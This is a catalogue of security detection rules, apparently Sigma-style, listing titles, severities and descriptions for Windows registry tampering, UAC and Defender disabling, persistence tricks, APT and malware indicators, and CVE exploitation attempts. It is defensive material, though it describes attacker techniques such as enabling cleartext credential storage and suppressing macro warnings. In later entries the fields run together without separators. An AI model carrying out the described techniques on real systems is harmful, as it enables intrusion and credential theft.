RestrictedAdminMode Registry Value Tampering | high | Detects changes to the "DisableRestrictedAdmin" registry value in order to disable or enable RestrictedAdmin mode. RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop. This prevents your credentials from being harvested during the initial connection process if the remote server has been compromised
NET NGenAssemblyUsageLog Registry Key Tamper | high | Detects changes to the NGenAssemblyUsageLog registry key. The .NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the registry or by configuring an environment variable (as described in the next section). By simply specifying an arbitrary value (e.g. a fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created.
Microsoft Office Protected View Disabled | high | Detects changes to Microsoft Office Protected View registry keys with which the attacker disables this feature.
Trust Access Disable For VBApplications | high | Detects registry changes to Microsoft Office "AccessVBOM" to a value of "1", which disables trust access for VBA on the victim machine and lets attackers execute malicious macros without any Microsoft Office warnings.
Python Function Execution Security Warning Disabled In Excel - Registry | high | Detects changes to the registry value "PythonFunctionWarnings" that would prevent any warnings or alerts from showing when Python functions are about to be executed. Threat actors could run malicious code through the new Microsoft Excel feature that allows Python to run within the spreadsheet.
Outlook EnableUnsafeClientMailRules Setting Enabled - Registry | high | Detects an attacker trying to enable the Outlook security setting "EnableUnsafeClientMailRules", which allows Outlook to run applications or execute macros
Uncommon Microsoft Office Trusted Location Added | high | Detects changes to registry keys related to the "Trusted Location" of Microsoft Office where the path is set to something uncommon. Attackers might add additional trusted locations to avoid macro security restrictions.
Macro Enabled In A Potentially Suspicious Document | high | Detects registry changes to Office trust records where the path is located in a potentially suspicious location
Office Macros Warning Disabled | high | Detects registry changes to Microsoft Office "VBAWarning" to a value of "1", which enables the execution of all macros, whether signed or unsigned.
MaxMpxCt Registry Value Changed | low | Detects changes to the "MaxMpxCt" registry value. MaxMpxCt specifies the maximum outstanding network requests for the server per client, which is used when negotiating a Server Message Block (SMB) connection with a client. Note that if the value is set beyond 125, older Windows 9x clients will fail to negotiate. Ransomware threat actors and operators (specifically BlackCat) were seen increasing this value in order to handle a higher volume of traffic.
Potential Persistence Via Custom Protocol Handler | medium | Detects potential persistence activity via the registering of new custom protocol handlers. While legitimate applications often register protocol handlers during installation, an attacker can abuse this by setting a custom handler to be used as a persistence mechanism.
Potential Persistence Via Event Viewer Events.asp | medium | Detects potential registry persistence technique using the Event Viewer "Events.asp" technique
Potential Persistence Via GlobalFlags | high | Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys
Modification of IE Registry Settings | low | Detects modification of the registry settings used for Internet Explorer and other Windows components that use these settings. An attacker can abuse this registry key to add a domain to the Trusted Sites zone or insert JavaScript for persistence
Potential WerFault ReflectDebugger Registry Value Abuse | high | Detects potential WerFault "ReflectDebugger" registry value abuse for persistence.
Potential Attachment Manager Settings Associations Tamper | high | Detects tampering with Attachment Manager settings policies associations to lower the default file type risks (see reference for more information)
Potential Attachment Manager Settings Attachments Tamper | high | Detects tampering with Attachment Manager settings policies attachments (see reference for more information)
Potential PowerShell Execution Policy Tampering | medium | Detects changes to the PowerShell execution policy in order to bypass signing requirements for script execution
PowerShell Logging Disabled Via Registry Key Tampering | high | Detects changes to the registry for the currently logged-in user in order to disable PowerShell module logging, script block logging or transcription and script execution logging
Potential Provisioning Registry Key Abuse For Binary Proxy Execution - REG | high | Detects potential abuse of the provisioning registry key for indirect command execution through "Provlaunch.exe".
ETW Logging Disabled For rpcrt4.dll | low | Detects changes to the "ExtErrorInformation" key in order to disable ETW logging for rpcrt4.dll
ScreenSaver Registry Key Set | medium | Detects a registry key established after masqueraded .scr file execution using Rundll32 through desk.cpl
ETW Logging Disabled For SCM | low | Detects changes to the "TracingDisabled" key in order to disable ETW logging for services.exe (SCM)
Registry Explorer Policy Modification | medium | Detects registry modifications that disable internal tools or functions in Explorer (malware like Agent Tesla uses this technique)
Persistence Via New SIP Provider | medium | Detects when an attacker registers a new SIP provider for persistence and defense evasion
Tamper With Sophos AV Registry Keys | high | Detects tampering attempts with Sophos AV functionality via registry key modification
Hiding User Account Via SpecialAccounts Registry Key | high | Detects modifications to the registry key "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" where the value is set to "0" in order to hide a user account from being listed on the logon screen.
Activate Suppression of Windows Security Center Notifications | medium | Detects setting Notification_Suppress to 1 to disable Windows Security Center notifications
Suspicious Environment Variable Has Been Registered | high | Detects the creation of user-specific or system-wide environment variables via the registry which contain suspicious commands and strings
Potential PendingFileRenameOperations Tampering | medium | Detects changes to the "PendingFileRenameOperations" registry key from uncommon or suspicious image locations to stage currently used files for rename or deletion after reboot.
Suspicious Service Installed | medium | Detects installation of NalDrv or PROCEXP152 services via registry keys to non-system32 folders. Both services are used in the tool Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU (https://github.com/hfiref0x/KDU)
Enable LM Hash Storage | high | Detects changes to the "NoLMHash" registry value in order to allow Windows to store LM hashes. By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN Manager hash of your password in Active Directory and local SAM databases.
RDP Sensitive Settings Changed to Zero | medium | Detects tampering with RDP Terminal Service/Server sensitive settings, such as allowing unauthorized users access to a system via 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections', etc.
RDP Sensitive Settings Changed | high | Detects tampering with RDP Terminal Service/Server sensitive settings, such as allowing unauthorized users access to a system via 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections', etc.
Old TLS1.0/TLS1.1 Protocol Version Enabled | medium | Detects applications or users re-enabling old TLS versions by setting the "Enabled" value to "1" for the "Protocols" registry key.
Potential Signing Bypass Via Windows Developer Features - Registry | high | Detects the enablement of developer features such as "Developer Mode" or "Application Sideloading", which allows the user to install untrusted packages.
UAC Bypass via Event Viewer | high | Detects UAC bypass method using Windows Event Viewer
UAC Bypass via Sdclt | high | Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. UACMe 53)
UAC Bypass Abusing Winsat Path Parsing - Registry | high | Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)
UAC Bypass Using Windows Media Player - Registry | high | Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)
UAC Disabled | medium | Detects when an attacker tries to disable User Account Control (UAC) by setting the registry value "EnableLUA" to 0.
UAC Notification Disabled | medium | Detects when an attacker tries to disable User Account Control (UAC) notifications by tampering with the "UACDisableNotify" value. UAC is a critical security feature in Windows that prevents unauthorized changes to the operating system. It prompts the user for permission or an administrator password before allowing actions that could affect the system's operation or change settings that affect other users. When "UACDisableNotify" is set to 1, UAC prompts are suppressed.
UAC Secure Desktop Prompt Disabled | medium | Detects when an attacker tries to change the User Account Control (UAC) elevation request destination via the "PromptOnSecureDesktop" value. The "PromptOnSecureDesktop" setting specifically determines whether UAC prompts are displayed on the secure desktop. The secure desktop is a separate desktop environment that's isolated from other processes running on the system. It's designed to prevent malicious software from intercepting or tampering with UAC prompts. When "PromptOnSecureDesktop" is set to 0, UAC prompts are displayed on the user's current desktop instead of the secure desktop. This reduces the level of security because it potentially exposes the prompts to manipulation by malicious software.
Wdigest Enable UseLogonCredential | high | Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to enable clear-text credentials
Execution DLL of Choice Using WAB.EXE | high | This rule detects that the path to the DLL written in the registry is different from the default one. When launched, WAB.exe tries to load the DLL from the registry.
Disable Windows Defender Functionalities Via Registry Keys | high | Detects when attackers or tools disable Windows Defender functionalities via the Windows registry
Winget Admin Settings Modification | low | Detects changes to the AppInstaller (winget) admin settings, such as enabling local manifest installations or disabling installer hash checks
Enable Local Manifest Installation With Winget | medium | Detects changes to the AppInstaller (winget) policy, specifically the activation of local manifest installation, which allows a user to install new packages via custom manifests.
Winlogon AllowMultipleTSSessions Enable | medium | Detects when the 'AllowMultipleTSSessions' value is enabled, which allows multiple Remote Desktop connection sessions to be opened at once. This is often used by attackers as a way to connect to an RDP session without disconnecting the other users
Sysmon Configuration Change | medium | Detects a Sysmon configuration change, which could be the result of a legitimate reconfiguration or someone trying to manipulate the configuration
Sysmon Configuration Error | high | Detects when an adversary is trying to hide its actions from Sysmon logging based on error messages
Sysmon Configuration Modification | high | Detects when an attacker tries to hide from Sysmon by disabling or stopping it
Sysmon Blocked Executable | high | Triggers on any Sysmon "FileBlockExecutable" event, which indicates a violation of the configured block policy
Sysmon Blocked File Shredding | high | Triggers on any Sysmon "FileBlockShredding" event, which indicates a violation of the configured shredding policy.
Sysmon File Executable Creation Detected | medium | Triggers on any Sysmon "FileExecutableDetected" event, which fires every time a PE that is monitored by the config is created.
ZxShell Malware | critical | Detects a ZxShell start by the called and well-known function name
Exploit for CVE-2015-1641 | critical | Detects Winword starting the uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641
Fireball Archer Install | high | Detects Archer malware invocation via rundll32
Malware Shellcode in Verclsid Target Process | high | Detects a process access to verclsid.exe that injects shellcode from a Microsoft Office application / VBA macro
NotPetya Ransomware Activity | critical | Detects NotPetya ransomware activity in which the extracted passwords are passed back to the main module via named pipe, the file system journal of drive C is deleted and Windows eventlogs are cleared using wevtutil
Potential PlugX Activity | high | Detects the execution of an executable that is typically used by PlugX for DLL side loading starting from an uncommon location
WannaCry Ransomware Activity | critical | Detects WannaCry ransomware activity
Ps.exe Renamed SysInternals Tool | high | Detects renamed SysInternals tool execution with a binary named ps.exe as used by the Dragonfly APT group and documented in the TA17-293A report
Lazarus System Binary Masquerading | high | Detects binaries used by the Lazarus group which use system names but are executed and launched from a non-default location
APT27 - Emissary Panda Activity | critical | Detects the execution of DLL side-loading malware used by threat group Emissary Panda aka APT27
Sofacy Trojan Loader Activity | high | Detects Trojan loader activity as used by APT28
APT29 2018 Phishing Campaign File Indicators | critical | Detects indicators of the APT 29 (Cozy Bear) phishing campaign as reported by Mandiant
APT29 2018 Phishing Campaign CommandLine Indicators | critical | Detects indicators of the APT 29 (Cozy Bear) phishing campaign as reported by Mandiant
OceanLotus Registry Activity | critical | Detects registry keys created in OceanLotus (also known as APT32) attacks
Potential MuddyWater APT Activity | high | Detects potential MuddyWater APT activity
OilRig APT Activity | critical | Detects OilRig activity as reported by Nyotron in their March 2018 report
OilRig APT Registry Persistence | critical | Detects OilRig registry persistence as reported by Nyotron in their March 2018 report
OilRig APT Schedule Task Persistence - Security | critical | Detects OilRig scheduled task persistence as reported by Nyotron in their March 2018 report
OilRig APT Schedule Task Persistence - System | critical | Detects OilRig scheduled task persistence as reported by Nyotron in their March 2018 report
Potential Baby Shark Malware Activity | high | Detects activity that could be related to Baby Shark malware
Potential Dridex Activity | critical | Detects potential Dridex activity via specific process patterns
Potential Emotet Activity | high | Detects all Emotet-like process executions that are not covered by the more generic rules
Potential APT-C-12 BlueMushroom DLL Load Activity Via Regsvr32 | medium | Detects potential BlueMushroom DLL loading activity via regsvr32 from AppData Local
Potential EmpireMonkey Activity | high | Detects potential EmpireMonkey APT activity
Equation Group DLL_U Export Function Load | critical | Detects a specific export function name used by one of the Equation Group tools
Operation Wocao Activity | high | Detects activity mentioned in the Operation Wocao report
Operation Wocao Activity - Security | high | Detects activity mentioned in the Operation Wocao report
Potential Emotet Rundll32 Execution | critical | Detects Emotet DLL loading by looking for rundll32.exe processes with command lines ending in ,RunDLL or ,Control_RunDLL
ComRAT Network Communication | high | Detects Turla ComRAT network communication.
CVE-2020-1048 Exploitation Attempt - Suspicious New Printer Ports - Registry | high | Detects changes to the "Ports" registry key with data that includes a Windows path or a file with a suspicious extension. This could be an attempt to exploit CVE-2020-1048 - a Windows Print Spooler elevation of privilege vulnerability.
Potential Ke3chang/TidePool Malware Activity | high | Detects registry modifications potentially related to the Ke3chang/TidePool malware as seen in campaigns running in 2019 and 2020
EvilNum APT Golden Chickens Deployment Via OCX Files | critical | Detects the Golden Chickens deployment method as used by Evilnum and described in the ESET July 2020 report
Greenbug Espionage Group Indicators | critical | Detects tools and process executions used by Greenbug in their May 2020 campaign as reported by Symantec
Winnti Malware HK University Campaign | critical | Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Hong Kong universities
Winnti Pipemon Characteristics | critical | Detects specific process characteristics of Winnti Pipemon malware reported by ESET
Potential Exploitation Attempt From Office Application | high | Detects Office applications executing a child process that includes directory traversal patterns. This could be an attempt to exploit CVE-2022-30190 (MSDT RCE) or CVE-2021-40444 (MSHTML RCE)
Suspicious Computer Account Name Change CVE-2021-42287 | high | Detects the renaming of an existing computer account to an account name that doesn't contain a $ symbol as seen in attacks against CVE-2021-42287
Potential BlackByte Ransomware Activity | high | Detects command line patterns used by BlackByte ransomware in different operations
Potential Devil Bait Related Indicator | high | Detects the creation of ".xml" and ".txt" files in folders of the "\AppData\Roaming\Microsoft" directory by uncommon processes. This behavior was commonly seen across different Devil Bait samples and stages as described by the NCSC
Potential Devil Bait Malware Reconnaissance | high | Detects specific process behavior observed with Devil Bait samples
Goofy Guineapig Backdoor IOC | high | Detects malicious indicators seen used by the Goofy Guineapig malware
Potential Goofy Guineapig GoolgeUpdate Process Anomaly | high | Detects "GoogleUpdate.exe" spawning a new instance of itself in an uncommon location as seen used by the Goofy Guineapig backdoor
Small Sieve Malware File Indicator Creation | high | Detects filename indicators that contain a specific typo seen used by the Small Sieve malware.
APT PRIVATELOG Image Load Pattern | high | Detects an image load pattern as seen when a tool named PRIVATELOG is used and rarely observed under legitimate circumstances
Suspicious Set Value of MSDT in Registry (CVE-2022-30190) | medium | Detects setting of the ms-msdt MSProtocol URI scheme value in the registry, which could be an attempt to exploit CVE-2022-30190.
Potential Bumblebee Remote Thread CreationhighDetects remote thread injection events based on action seen used by bumblebee
Potential CVE-2023-36884 Exploitation Dropped FilemediumDetects a specific file being created in the recent folder of Office. These files have been seen being dropped during potential exploitations of CVE-2023-36884
Potential COLDSTEEL RAT File IndicatorshighDetects the creation of a file named "dllhost.exe" in the "C:\users\public\Documents\" directory. Seen being used by the COLDSTEEL RAT in some of its variants.
Potential COLDSTEEL Persistence Service DLL CreationhighDetects the creation of a file in a specific location and with a specific name related to COLDSTEEL RAT
Potential COLDSTEEL Persistence Service DLL LoadhighDetects a suspicious DLL load by an "svchost" process based on location and name that might be related to ColdSteel RAT. This DLL location and name has been seen used by ColdSteel as the service DLL for its persistence mechanism
COLDSTEEL RAT Anonymous User Process ExecutionhighDetects the creation of a process executing as user called "ANONYMOUS" seen used by the "MileStone2016" variant of COLDSTEEL
COLDSTEEL RAT Cleanup Command ExecutioncriticalDetects the creation of a "rundll32" process from the ColdSteel persistence service to initiate the cleanup command by calling one of its own exports. This functionality is not present in "MileStone2017" and some "MileStone2016" samples
COLDSTEEL RAT Service Persistence ExecutioncriticalDetects the creation of an "svchost" process with specific command line flags, that were seen present and used by ColdSteel RAT
COLDSTEEL Persistence Service CreationhighDetects the creation of new services potentially related to COLDSTEEL RAT
Injected Browser Process Spawning Rundll32 - GuLoader ActivityhighDetects the execution of installed GuLoader malware on the host. GuLoader is initiating network connections via the rundll32.exe process that is spawned via a browser parent(injected) process.
IcedID Malware Suspicious Single Digit DLL Execution Via Rundll32highDetects RunDLL32.exe executing a single digit DLL named "1.dll" with the export function "DllRegisterServer". This behaviour was often seen used by malware and especially IcedID
Potential Pikabot Hollowing ActivityhighDetects the execution of rundll32 that leads to the invocation of legitimate Windows binaries. The malware Pikabot has been seen to use this technique for process hollowing through hard-coded Windows binaries
Pikabot Fake DLL Extension Execution Via Rundll32.EXEhighDetects specific process tree behavior linked to "rundll32" executions, wherein the associated DLL lacks a common ".dll" extension, often signaling potential Pikabot activity.
Qakbot Regsvr32 Calc PatternhighDetects a specific command line of "regsvr32" where the "calc" keyword is used in conjunction with the "/s" flag. This behavior is often seen used by Qakbot
Potential Qakbot Rundll32 ExecutionhighDetects specific process tree behavior of a "rundll32" execution often linked with potential Qakbot activity.
Qakbot Rundll32 Exports ExecutioncriticalDetects specific process tree behavior of a "rundll32" execution with exports linked with Qakbot activity.
Qakbot Rundll32 Fake DLL Extension ExecutioncriticalDetects specific process tree behavior of a "rundll32" execution where the DLL doesn't have the ".dll" extension. This is often linked with potential Qakbot activity.
Rhadamanthys Stealer Module Launch Via Rundll32.EXEmediumDetects the use of Rundll32 to launch an NSIS module that serves as the main stealer capability of Rhadamanthys infostealer, as observed in reports and samples in early 2023
Rorschach Ransomware Execution ActivitycriticalDetects Rorschach ransomware execution activity
Malicious DLL Load By Compromised 3CXDesktopAppcriticalDetects DLL load activity of known compromised DLLs used in by the compromised 3CXDesktopApp
Potential Compromised 3CXDesktopApp ExecutionhighDetects execution of known compromised version of 3CXDesktopApp
Potential Compromised 3CXDesktopApp Update ActivityhighDetects the 3CXDesktopApp updater downloading a known compromised version of the 3CXDesktopApp software
DLL Names Used By SVR For GraphicalProton BackdoormediumHunts known SVR-specific DLL names.
Diamond Sleet APT DLL Sideloading IndicatorshighDetects DLL sideloading activity seen used by Diamond Sleet APT
Diamond Sleet APT Scheduled Task Creation - RegistryhighDetects registry event related to the creation of a scheduled task used by Diamond Sleet APT during exploitation of Team City CVE-2023-42793 vulnerability
Lazarus APT DLL Sideloading ActivityhighDetects sideloading of trojanized DLLs used in Lazarus APT campaign in the case of a Spanish aerospace company
UNC4841 - Email Exfiltration File PatternhighDetects filename pattern of email related data used by UNC4841 for staging and exfiltration
UNC4841 - Barracuda ESG Exploitation IndicatorshighDetects file indicators as seen used by UNC4841 during their Barracuda ESG zero day exploitation.
UNC4841 - SSL Certificate Exfiltration Via OpensslhighDetects the execution of "openssl" to connect to an IP address. This techniques was used by UNC4841 to exfiltrate SSL certificates and as a C2 channel with named pipes. Investigate commands executed in the temporal vicinity of this command.
UNC4841 - Download Compressed Files From Temp.sh Using WgethighDetects execution of "wget" to download a ".zip" or ".rar" files from "temp.sh". As seen used by UNC4841 during their Barracuda ESG zero day exploitation.
UNC4841 - Download Tar File From Untrusted Direct IP Via WgethighDetects execution of "wget" to download a "tar" from an IP address that doesn't have a trusted certificate. As seen used by UNC4841 during their Barracuda ESG zero day exploitation.
ScreenConnect User Database Modification - SecuritymediumThis detects file modifications to the temporary xml user database file indicating local user modification in the ScreenConnect server. This will occur during exploitation of the ScreenConnect Authentication Bypass vulnerability (CVE-2024-1709) in versions <23.9.8, but may also be observed when making legitimate modifications to local users or permissions. This requires an Advanced Auditing policy to log a successful Windows Event ID 4663 events and with a SACL set on the directory.
Potential CVE-2024-3400 Exploitation - Palo Alto GlobalProtect OS Command InjectionhighDetects potential exploitation attempts of CVE-2024-3400 - an OS command injection in Palo Alto GlobalProtect. This detection looks for suspicious strings that indicate a potential directory traversal attempt or command injection.
Potential Kapeka Decrypted Backdoor IndicatorhighDetects the presence of a file that is decrypted backdoor binary dropped by the Kapeka Dropper, which disguises itself as a hidden file under a folder named "Microsoft" within "CSIDL_COMMON_APPDATA" or "CSIDL_LOCAL_APPDATA", depending on the process privileges. The file, typically 5-6 characters long with a random combination of consonants and vowels followed by a ".wll" extension to pose as a legitimate file to evade detection.
Kapeka Backdoor Loaded Via Rundll32.EXEhighDetects the Kapeka Backdoor binary being loaded by rundll32.exe. The Kapeka loader drops a backdoor, which is a DLL with the '.wll' extension masquerading as a Microsoft Word Add-In.
Kapeka Backdoor Execution Via RunDLL32.EXEhighDetects Kapeka backdoor process execution pattern, where the dropper launch the backdoor binary by calling rundll32 and passing the backdoor's first export ordinal (#1) with a "-d" argument.
Kapeka Backdoor Configuration PersistencemediumDetects registry set activity of a value called "Seed" stored in the "\Cryptography\Providers\" registry key. The Kapeka backdoor leverages this location to register a new SIP provider for backdoor configuration persistence.
Lummac Stealer Activity - Execution Of More.com And Vbc.exehighDetects the execution of more.com and vbc.exe in the process tree. This behavior was observed by a set of samples related to Lummac Stealer. The Lummac payload is injected into the vbc.exe process.
Potential Raspberry Robin Aclui Dll SideLoadinghighDetects potential sideloading of malicious "aclui.dll" by OleView.This behavior was observed in Raspberry-Robin variants reported by chekpoint research on Feburary 2024.
Potential Raspberry Robin CPL Execution ActivityhighDetects the execution of a ".CPL" file located in the user temp directory via the Shell32 DLL "Control_RunDLL" export function. This behavior was observed in multiple Raspberry-Robin variants.
Potential Raspberry Robin Registry Set Internet Settings ZoneMaplowDetects registry modifications related to the proxy configuration of the system, potentially associated with the Raspberry Robin malware, as seen in campaigns running in Q1 2024. Raspberry Robin may alter proxy settings to circumvent security measures, ensuring unhindered connection with Command and Control servers for maintaining control over compromised systems if there are any proxy settings that are blocking connections.
Forest Blizzard APT - File Creation ActivityhighDetects the creation of specific files inside of ProgramData directory. These files were seen being created by Forest Blizzard as described by MSFT.
Forest Blizzard APT - JavaScript Constrained File CreationmediumDetects the creation of JavaScript files inside of the DriverStore directory. Forest Blizzard used this to exploit the CVE-2022-38028 vulnerability in Windows Print Spooler service by modifying a JavaScript constraints file and executing it with SYSTEM-level permissions.
Forest Blizzard APT - Process Creation ActivityhighDetects the execution of specific processes and command line combination. These were seen being created by Forest Blizzard as described by MSFT.
ScreenConnect - SlashAndGrab Exploitation IndicatorshighDetects indicators of exploitation by threat actors during exploitation of the "SlashAndGrab" vulnerability related to ScreenConnect as reported Team Huntress
Account Created And Deleted By Non Approved UsersmediumDetects accounts that are created or deleted by non-approved users.
Privilege Role Elevation Not Occuring on SAW or PAWhighDetects failed sign-in from a PAW or SAW device
Privilege Role Sign-In Outside Expected ControlshighDetects failed sign-in due to user not meeting expected controls for adminitrators
User with Privileges LogonlowDetects logon with "Special groups" and "Special Privileges" can be thought of as Administrator groups or privileges.
Remote Registry Management Using Reg UtilitymediumRemote registry management using REG utility from non-admin workstation
Terminate Linux Process Via KillmediumDetects usage of command line tools such as "kill", "pkill" or "killall" to terminate or signal a running process.
Firewall Rule Modified In The Windows Firewall Exception ListlowDetects when a rule has been modified in the Windows firewall exception list
CreateRemoteThread API and LoadLibrarymediumDetects potential use of CreateRemoteThread api and LoadLibrary function to inject DLL into a process
Access To Windows Outlook Mail Files By Uncommon ApplicationslowDetects file access requests to Windows Outlook Mail by uncommon processes. Could indicate potential attempt of credential stealing. Requires heavy baselining before usage
Access To .Reg/.Hive Files By Uncommon ApplicationslowDetects file access requests to files ending with either the ".hive"/".reg" extension, usually associated with Windows Registry backups.
ADS Zone.Identifier DeletedlowDetects the deletion of the "Zone.Identifier" ADS. Attackers can leverage this in order to bypass security restrictions that make use of the ADS such as Microsoft Office apps.
DMP/HDMP File CreationlowDetects the creation of a file with the ".dmp"/".hdmp" extension. Often created by software during a crash. Memory dumps can sometimes contain sensitive information such as credentials. It's best to determine the source of the crash.
Non-DLL Extension File Renamed With DLL ExtensionmediumDetects rename operations of files with non-DLL extensions to files with a DLL extension. This is often performed by malware in order to avoid initial detections based on extensions.
Amsi.DLL Load By Uncommon ProcesslowDetects loading of Amsi.dll by uncommon processes
Dllhost.EXE Initiated Network Connection To Non-Local IP AddressmediumDetects Dllhost.EXE initiating a network connection to a non-local IP address. Aside from Microsoft own IP range that needs to be excluded. Network communication from Dllhost will depend entirely on the hosted DLL. An initial baseline is recommended before deployment.
HH.EXE Initiated HTTP Network ConnectionmediumDetects a network connection initiated by the "hh.exe" process to HTTP destination ports, which could indicate the execution/download of remotely hosted .chm files.
Msiexec.EXE Initiated Network Connection Over HTTPlowDetects a network connection initiated by an "Msiexec.exe" process over port 80 or 443. Adversaries might abuse "msiexec.exe" to install and execute remotely hosted packages. Use this rule to hunt for potentially anomalous or suspicious communications.
Windows Mail App Mailbox Access Via PowerShell ScriptmediumDetects PowerShell scripts that try to access the default Windows MailApp MailBox. This indicates manipulation of or access to the stored emails of a user. E.g. this could be used by an attacker to exfiltrate or delete the content of the emails.
New Windows Firewall Rule Added Via New-NetFirewallRule Cmdlet - ScriptBlocklowDetects when a powershell script contains calls to the "New-NetFirewallRule" cmdlet in order to add a new firewall rule with an "Allow" action.
Use Of Remove-Item to Delete File - ScriptBlocklowPowerShell Remove-Item with -Path to delete a file or a folder with "-Recurse"
Potential Shellcode InjectionmediumDetects potential shellcode injection as seen used by tools such as Metasploit's migrate and Empire's psinject.
Set Files as System Files Using Attrib.EXElowDetects the execution of "attrib" with the "+s" flag to mark files as system files
Potential BOINC Software Execution (UC-Berkeley Signature)informationalDetects the use of software that is related to the University of California, Berkeley via metadata information. This indicates it may be related to BOINC software and can be used maliciously if unauthorized.
Potential File Override/Append Via SET CommandlowDetects the use of the "SET" internal command of Cmd.EXE with the /p flag followed directly by an "=" sign. Attackers used this technique along with an append redirection operator ">>" in order to update the content of a file indirectly. Ex: cmd /c >> example.txt set /p="test data". This will append "test data" to contents of "example.txt". The typical use case of the "set /p=" command is to prompt the user for input.
Headless Process Launched Via Conhost.EXEmediumDetects the launch of a child process via "conhost.exe" with the "--headless" flag. The "--headless" flag hides the windows from the user upon execution.
Dynamic .NET Compilation Via Csc.EXE - HuntingmediumDetects execution of "csc.exe" to compile .NET code. Attackers often leverage this to compile code on the fly and use it in other stages.
Diskshadow Child Process SpawnedmediumDetects any child process spawning from "Diskshadow.exe". This could be due to executing Diskshadow in interpreter mode or script mode and using the "exec" flag to launch other applications.
ClickOnce Deployment Execution - Dfsvc.EXE Child ProcessmediumDetects child processes of "dfsvc" which indicates a ClickOnce deployment execution.
Diskshadow Script Mode ExecutionmediumDetects execution of "Diskshadow.exe" in script mode using the "/s" flag. Attackers often abuse "diskshadow" to execute scripts that deleted the shadow copies on the systems. Investigate the content of the scripts and its location.
Potential Proxy Execution Via Explorer.EXE From Shell ProcesslowDetects the creation of a child "explorer.exe" process from a shell like process such as "cmd.exe" or "powershell.exe". Attackers can use "explorer.exe" for evading defense mechanisms by proxying the execution through the latter. While this is often a legitimate action, this rule can be use to hunt for anomalies. Muddy Waters threat actor was seeing using this technique.
Potential DLL Sideloading Activity Via ExtExport.EXEmediumDetects the execution of "Extexport.exe".A utility that is part of the Internet Explorer browser and is used to export and import various settings and data, particularly when switching between Internet Explorer and other web browsers like Firefox. It allows users to transfer bookmarks, browsing history, and other preferences from Internet Explorer to Firefox or vice versa. It can be abused as a tool to side load any DLL. If a folder is provided in the command line it'll load any DLL with one of the following names "mozcrt19.dll", "mozsqlite3.dll", or "sqlite.dll". Arbitrary DLLs can also be loaded if a specific number of flags was provided.
New Self Extracting Package Created Via IExpress.EXEmediumDetects the "iexpress.exe" utility creating self-extracting packages. Attackers where seen leveraging "iexpress" to compile packages on the fly via ".sed" files. Investigate the command line options provided to "iexpress" and in case of a ".sed" file, check the contents and legitimacy of it.
Microsoft Workflow Compiler ExecutionmediumDetects the execution of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code.
CodePage Modification Via MODE.COMlowDetects a CodePage modification using the "mode.com" utility. This behavior has been used by threat actors behind Dharma ransomware.
Suspicious New Instance Of An Office COM ObjectmediumDetects an svchost process spawning an instance of an office application. This happens when the initial word application creates an instance of one of the Office COM objects such as 'Word.Application', 'Excel.Application', etc. This can be used by malicious actors to create malicious Office documents with macros on the fly. (See vba2clr project in the references)
Invocation Of Crypto-Classes From The "Cryptography" PowerShell NamespacemediumDetects the invocation of PowerShell commands with references to classes from the "System.Security.Cryptography" namespace. The PowerShell namespace "System.Security.Cryptography" provides classes for on-the-fly encryption and decryption. These can be used for example in decrypting malicious payload for defense evasion.
Regsvr32.EXE Calling of DllRegisterServer Export Function ImplicitlymediumDetects execution of regsvr32 with the silent flag and no other flags on a DLL located in an uncommon or potentially suspicious location. When Regsvr32 is called in such a way, it implicitly calls the DLL export function 'DllRegisterServer'.
DLL Call by Ordinal Via Rundll32.EXEmediumDetects calls of DLLs exports by ordinal numbers via rundll32.dll.
Rundll32.EXE Calling DllRegisterServer Export Function ExplicitlymediumDetects when the DLL export function 'DllRegisterServer' is called in the commandline by Rundll32 explicitly where the DLL is located in a non-standard path.
Potential CommandLine Obfuscation Using Unicode CharactersmediumDetects potential CommandLine obfuscation using unicode characters. Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.
Elevated System Shell SpawnedmediumDetects when a shell program such as the Windows command prompt or PowerShell is launched with system privileges. Use this rule to hunt for potential suspicious processes.
Potential Suspicious Execution From GUID Like Folder NameslowDetects potential suspicious execution of a GUID like folder name located in a suspicious location such as %TEMP% as seen being used in IcedID attacks. Use this rule to hunt for potentially suspicious activity stemming from uncommon folders.
File or Folder Permissions ModificationsmediumDetects a file or folder's permissions being modified or tampered with.
Arbitrary Command Execution Using WSLmediumDetects potential abuse of Windows Subsystem for Linux (WSL) binary as a Living of the Land binary in order to execute arbitrary Linux or Windows commands.
Microsoft Office Trusted Location UpdatedmediumDetects changes to the registry keys related to "Trusted Location" of Microsoft Office. Attackers might add additional trusted locations to avoid macro security restrictions.
Registry Set With Crypto-Classes From The "Cryptography" PowerShell NamespacemediumDetects the setting of a registry inside the "\Shell\Open\Command" value with PowerShell classes from the "System.Security.Cryptography" namespace. The PowerShell namespace "System.Security.Cryptography" provides classes for on-the-fly encryption and decryption. These can be used for example in decrypting malicious payload for defense evasion.
Service Binary in User Controlled FoldermediumDetects the setting of the "ImagePath" value of a service registry key to a path controlled by a non-administrator user such as "\AppData\" or "\ProgramData\". Attackers often use such directories for staging purposes. This rule might also trigger on badly written software, where if an attacker controls an auto starting service, they might achieve persistence or privilege escalation. Note that while ProgramData is a user controlled folder, software might apply strict ACLs which makes them only accessible to admin users. Remove such folders via filters if you experience a lot of noise.
AWS Macie EvasionmediumDetects evade to Macie detection.
Use of Debugfs to Access a Raw DiskmediumDetects access to a raw disk on a host to evade detection by security products.
Invoke-Obfuscation CLIP+ LauncherhighDetects Obfuscated use of Clip.exe to execute PowerShell
